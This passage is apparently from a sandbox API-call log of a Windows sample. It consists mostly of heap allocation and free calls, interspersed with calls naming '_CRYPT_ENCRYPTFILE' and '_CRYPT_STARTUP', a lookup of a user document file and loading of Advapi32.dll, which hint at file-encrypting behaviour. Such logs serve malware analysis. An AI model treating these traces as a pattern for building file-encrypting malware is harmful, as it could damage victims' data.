hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.355] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0080.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0080.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0080.355] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0080.366] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.366] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0080.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0080.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0080.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0080.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0080.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.367] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0080.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.369] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c9167c0, ftCreationTime.dwHighDateTime=0x1d5ecfc, ftLastAccessTime.dwLowDateTime=0x9150bcd0, ftLastAccessTime.dwHighDateTime=0x1d5e821, ftLastWriteTime.dwLowDateTime=0x9150bcd0, ftLastWriteTime.dwHighDateTime=0x1d5e821, nFileSizeHigh=0x0, nFileSizeLow=0x6707, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="244Ql-yOIaa.pps", cAlternateFileName="244QL-~1.PPS")) returned 0x41ac500 [0080.370] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0080.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.370] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0080.371] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb150 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.371] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0080.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb348 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0080.371] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0080.371] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0080.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.372] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0080.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.372] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0080.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 